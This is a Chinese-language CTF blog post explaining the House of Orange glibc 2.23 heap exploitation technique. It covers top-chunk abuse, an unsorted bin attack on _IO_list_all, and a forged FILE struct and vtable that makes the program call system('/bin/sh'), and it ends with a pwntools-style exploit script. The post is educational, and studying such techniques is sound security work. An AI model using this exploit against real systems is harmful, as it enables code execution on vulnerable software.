

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="前言关于orange前面topchunk构造出unsortedbin的利用手法早就已经学了，但是后面io的攻击始终没有接触，刚好最近在出题，于是学了一下 参考链接: https:&#x2F;&#x2F;blog.wjhwjhn.com&#x2F;posts&#x2F;house-of-orange-%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95&#x2F; https:&#x2F;&#x2F;ctf-wiki.org&#x2F;pwn&#x2F;linux&#x2F;u">
<meta property="og:type" content="article">
<meta property="og:title" content="house_of_orange">
<meta property="og:url" content="http://blogyoulin.top/2024/03/15/house-of-orange/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="前言关于orange前面topchunk构造出unsortedbin的利用手法早就已经学了，但是后面io的攻击始终没有接触，刚好最近在出题，于是学了一下 参考链接: https:&#x2F;&#x2F;blog.wjhwjhn.com&#x2F;posts&#x2F;house-of-orange-%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95&#x2F; https:&#x2F;&#x2F;ctf-wiki.org&#x2F;pwn&#x2F;linux&#x2F;u">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2024-03-14T16:03:49.000Z">
<meta property="article:modified_time" content="2024-03-14T16:23:53.372Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>house_of_orange - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"blogyoulin.top","root":"/","version":"1.9.5","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
</head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>幽林</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>Links</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="house_of_orange"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-03-15 00:03" pubdate>
          March 15, 2024 am
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4.8k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          40 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">house_of_orange</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>关于orange前面topchunk构造出unsortedbin的利用手法早就已经学了，但是后面io的攻击始终没有接触，刚好最近在出题，于是学了一下</p>
<p>参考链接:</p>
<p><a target="_blank" rel="noopener" href="https://blog.wjhwjhn.com/posts/house-of-orange-%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/">https://blog.wjhwjhn.com/posts/house-of-orange-%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/</a></p>
<p><a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/house-of-orange/">https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/house-of-orange/</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/xshhc/p/17327672.html">https://www.cnblogs.com/xshhc/p/17327672.html</a></p>
<h1 id="题目特点"><a href="#题目特点" class="headerlink" title="题目特点"></a>题目特点</h1><p>1.一般libc版本是2.23</p>
<p>2.题目中并没有free函数</p>
<p>3.保护全开</p>
<p>4.堆溢出</p>
<h1 id="利用过程"><a href="#利用过程" class="headerlink" title="利用过程"></a>利用过程</h1><p>1.利用topchunk，构造出unsortedbin(即修改topchunk的size然后申请一个比topchunk.size更大的堆块)</p>
<p>2.泄露出libc和heap的地址</p>
<p>3.利用unsortedbin attack修改_IO_list_all的地址为main_arena+88</p>
<p>4.申请出smallbin同时在堆上伪造io(注意这3.4需要在一个步骤进行)</p>
<h1 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h1><p><strong>第一部分，利用topchunk来free</strong> 先来讲解第一部分，也就是利用topchunk来free从而得到堆地址和libc基址。 这个方法利用的就是当topchunk的size不足够申请的时候，malloc函数会重新申请一块区域作为topchunk，并且把当前的topchunk free掉到unsorted bin，所以我们就可以尝试修改topchunk的size，修改到不足够的大小，然后再申请一次比修改的topchunk的size要大的size</p>
<p>但是free的topchunk的size有一些要求（很多地方对这个介绍的很复杂，所以我想简单的来说）</p>
<ol>
<li>不要太小，比如小于0x10(MINSIZE)就不行了</li>
<li>topchunk的结束地址（当前地址 + size）要与页基址对齐，一般就是0x1000（结尾三个0）</li>
<li>prev_inuse &#x3D; 1</li>
</ol>
<p>所以，当我们再次申请大于topchunk size的时候，就会进入unsorted bin，我们就可以leak libc了，并且可以同时泄露出堆地址</p>
<p><strong>第二步是利用<code>_IO_flush_all_lockp</code>进行攻击</strong> 这个函数我在ByteCTF 2019 note_five的那道题中也用到过，到了这里终于可以好好解释一下了。</p>
<p>什么时候会触发这个函数？ 当系统发生abort的时候，会利用<code>_IO_flush_all_lockp</code>来看看各个fp指针中还有没有数据没有输出的，如果有，那么就会调用<code>_IO_OVERFLOW</code>。 <code>_IO_OVERFLOW</code>这个函数是调用当前fp指针的vtable中的+0x18地址。</p>
<p>这个函数做了什么？ 通过<code>_IO_all_list</code>获取到头指针，然后用<code>fp-&gt;_chain</code>来寻找下一个指针，直到0的时候停止。 所以，如果我们可以控制<code>_IO_list_all</code>，并且达成他要求的一些条件，那么我们就可以通过伪造vtable的<code>_IO_OVERFLOW</code>位置（+0x18）的方式来getshell。 不过在libc2.24以上就已经加入了对vtable范围的检测，所以在这里我们的测试环境都是在libc2.23下（ubuntu 16.04）。</p>
<p>具体如何构造和利用？ 由于我们现在没有权限直接对<code>_IO_all_list</code>进行写入地址（废话，如果可以直接写入，那么就直接打<code>__malloc_hook</code>不香吗） 但是我们可以用unsorted bin attack在<code>_IO_all_list</code>上写一个<code>main_arena + 88</code>的地址，然后在<code>_IO_flush_all_lockp</code>函数中就会认为这个地址是一个fp指针，并且判定这个指针的条件是否成立，如果成立的话执行<code>_IO_OVERFLOW</code>，当然由于<code>main_arena</code>的内容很难控制，所以我们无法直接修改这上面的内容进行getshell。</p>
<p>所以我们要考虑条件不成立的情况，也就是程序没有再次发生异常（因为上诉中vtable的值不受控，如果vtable的值不正确，就可能会发生异常），程序就会到<code>fp-&gt;_chain</code>继续查找下一个指针。调试可以发现<code>fp-&gt;_chain</code>正好就是smallbin[4]的位置，对应的存放的smallbin size为0x60，所以我们如果可以修改这个位置为一个可控的地址，那么就可以成功伪造一个下一个fp指针达到getshell的目的。</p>
<p>怎么样才能写入堆地址到smallbin[4]呢？ 当你malloc的时候，程序会去看unsorted bin有没有符合的size，这个时候会把unsorted bin拿出来检测，如果大小不合适的话，这时候会先放到small bin中去。 所以如果我们构造一个size为0x60的unsorted bin，然后再free它，那么就可以成功的让他进入smallbin，在那里写入的地址就是这个堆的地址，而这个堆内容被我们提前布置好，就可以成功getshell了。</p>
<p>堆上需要布置哪些东西呢？ 我们需要布置的内容有：</p>
<figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs xl">      <span class="hljs-function"><span class="hljs-title">if</span> (((fp-&gt;</span>_<span class="hljs-function"><span class="hljs-title">mode</span> &lt;= 0 &amp;&amp; fp-&gt;</span>_IO_<span class="hljs-function"><span class="hljs-title">write_ptr</span> &gt; fp-&gt;</span>_IO_write_base)<br>#<span class="hljs-keyword">if</span> defined _LIBC || defined _GLIBCPP_USE_WCHAR_T<br>	   || (_IO_vtable_offset (fp) == <span class="hljs-number">0</span><br>	       &amp;&amp; <span class="hljs-function"><span class="hljs-title">fp</span>-&gt;</span>_<span class="hljs-function"><span class="hljs-title">mode</span> &gt; 0 &amp;&amp; (fp-&gt;</span>_<span class="hljs-function"><span class="hljs-title">wide_data</span>-&gt;</span>_IO_write_ptr<br>				    &gt; <span class="hljs-function"><span class="hljs-title">fp</span>-&gt;</span>_<span class="hljs-function"><span class="hljs-title">wide_data</span>-&gt;</span>_IO_write_base))<br>#endif<br>	   )<br>	  &amp;&amp; _IO_OVERFLOW (fp, EOF) == EOF)<br>	result = EOF;<br></code></pre></td></tr></table></figure>

<p>我们知道if是从左到右依次执行的，如果前面的不符合后面的也不会执行，所以我们可以构造下面两者中任意一个。 1.<code>(fp-&gt;_mode &lt;= 0 &amp;&amp; fp-&gt;_IO_write_ptr &gt; fp-&gt;_IO_write_base)</code> 2.<code>(_IO_vtable_offset (fp) == 0 &amp;&amp; fp-&gt;_mode &gt; 0 &amp;&amp; (fp-&gt;_wide_data-&gt;_IO_write_ptr &gt; fp-&gt;_wide_data-&gt;_IO_write_base)</code></p>
<p>把vtable的值写入一个可控的位置，并且修改<code>vtable+0x18</code>的位置为想要执行的函数</p>
<p>最后来说说这个流程： 构造后当程序调用到这个位置的fp（前提是前一块没有报错，概率是1&#x2F;2，因为在main_arena上的<code>fp-&gt;_mode</code>的值是不可控的）。 并且判定条件成立，就会去vtable表中执行<code>_IO_OVERFLOW</code>，执行了我们修改的函数。 顺带一提的是，当执行<code>_IO_OVERFLOW</code>的时候，传入的第一个参数就是，这个fp的地址，所以说，如果我们可以修改这个伪造fp的头部位置为&#x2F;bin&#x2F;sh，并且伪造vtable中IO_overflow位置为system，那么就可以成功getshell了。 所以我们可以修改我们的可控位置，也就是fp的地址为想要执行的内容，但是一般来说直接修改头部位置，也就是<code>_flags</code>的位置是不太好的，不过由于这里根本没有用到_flags，所以我们可以直接修改。 如果不可以修改<code>_flags</code>的情况，那么就在他后面写一个;sh;，这样的话由于;的隔开，前面后面的语句都会认为是错误的，所以也成功执行了sh。</p>
<p>我们有一个方法可以同时完成以上步骤，就是一次性写好所有的构造数据在堆上，这时候malloc一次和原来的数据大小不一样的size。 这时候的执行步骤的这样的。 1.执行unsorted bin attack，修改<code>BK-&gt;fd = main_arena + 88</code> 2.malloc chunk发现unsorted bin中的size和要申请的size大小不匹配，所以把unsorted bin中的数据放到了smallbin中，具体是哪块位置呢？这时候就要看size了，这里构造的size是0x60，所以就会进入到smallbin[4]中，这里对应的内容就是<code>fp-&gt;_chain</code>。 3.由于链表被破坏了，所以在之后的检测发生了报错，这个报错就会调用到<code>_IO_flush_all_lockp</code>，而这里就会对<code>_IO_list_all</code>进行遍历，由于1中修改了<code>_IO_list_all</code>为<code>main_arena + 88</code>，这时候就会去看对应数据符不符合要求。 如果这里符合要求，那么就会调用这里vtable的<code>IO_overflow</code>，由于这里的数据我们没有构造过，所以就会发生又一次异常，getshell失败了（1&#x2F;2）。 如果这里不符合要求，就会去看这里的<code>fp-&gt;_chain</code>的位置，正好是我们伪造的smallbin[4]的地方，这时候fp指针指向我们伪造的堆块，堆块的对应内容符合要求，就会去我们伪造的可控的vtable执行<code>_IO_OVERFLOW</code>，而这里被我们伪造成system，并且我们修改这个fp的头部位置为<code>/bin/sh</code>，所以当调用的时候就会把这个作为参数去调用，最后就是执行了<code>system(&quot;/bin/sh&quot;)</code>，也就成功getshell了。</p>
<h1 id="例题："><a href="#例题：" class="headerlink" title="例题："></a>例题：</h1><p>题目是自己出的，等什么时候那边使用了再放出来吧</p>
<p>exp:</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-built_in">add</span>(0,0x30)<br><span class="hljs-built_in">edit</span>(0,0x40,b<span class="hljs-string">&#x27;A&#x27;</span><span class="hljs-number">*0</span>x30+p64(0)+p64(0xfc1))<br><br><span class="hljs-built_in">add</span>(1,0x1000)<br><span class="hljs-built_in">add</span>(2,0x400)<br>show(2)<br><span class="hljs-attribute">libcbase</span>=uu64()-0x3c5188<br>lg(<span class="hljs-string">&quot;libcbase&quot;</span>)<br><span class="hljs-attribute">io_list_all</span>=libcbase+libc.sym[<span class="hljs-string">&#x27;_IO_list_all&#x27;</span>]<br><span class="hljs-attribute">system</span>=libcbase+libc.sym[<span class="hljs-string">&#x27;system&#x27;</span>]<br><span class="hljs-attribute">fd</span>=libcbase+0x3c4b78<br><br><span class="hljs-built_in">edit</span>(2,0x10,b<span class="hljs-string">&#x27;A&#x27;</span><span class="hljs-number">*0</span>xf+b<span class="hljs-string">&#x27;B&#x27;</span>)<br>show(2)<br>ru(b<span class="hljs-string">&#x27;B&#x27;</span>)<br><span class="hljs-attribute">heapbase</span>=u64(io.recvuntil(b&#x27;\n&#x27;,drop=True).ljust(8,b&#x27;\x00&#x27;))-0x40<br>lg(<span class="hljs-string">&quot;heapbase&quot;</span>)<br><br><span class="hljs-attribute">vtable</span>=heapbase+0x450<br>payload = b<span class="hljs-string">&#x27;a&#x27;</span> * 0x400<br>fake_file = b<span class="hljs-string">&#x27;/bin/sh\x00&#x27;</span> + p64(0x61)<br>fake_file += p64(system) + p64(io_list_all - 0x10)<br>fake_file += p64(0) + p64(1)<br>fake_file = fake_file.ljust(0xc0,b<span class="hljs-string">&#x27;\x00&#x27;</span>)<br>fake_file += p64(0) * 3<br>fake_file += p64(vtable+0xf0-0x18)<br>fake_file += p64(0) * 2<br>fake_file += p64(system)<br>payload += fake_file<br><span class="hljs-built_in">edit</span>(2,len(payload),payload)<br><span class="hljs-built_in">add</span>(3,0x10)<br><br>ia()<br></code></pre></td></tr></table></figure>


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>house_of_orange</div>
      <div>http://blogyoulin.top/2024/03/15/house-of-orange/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>John Doe</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>March 15, 2024</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/03/15/%E5%BC%82%E6%9E%84%E5%AD%A6%E4%B9%A0/" title="异构学习">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">异构学习</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/03/04/kernel-rop/" title="kernel_rop">
                        <span class="hidden-mobile">kernel_rop</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
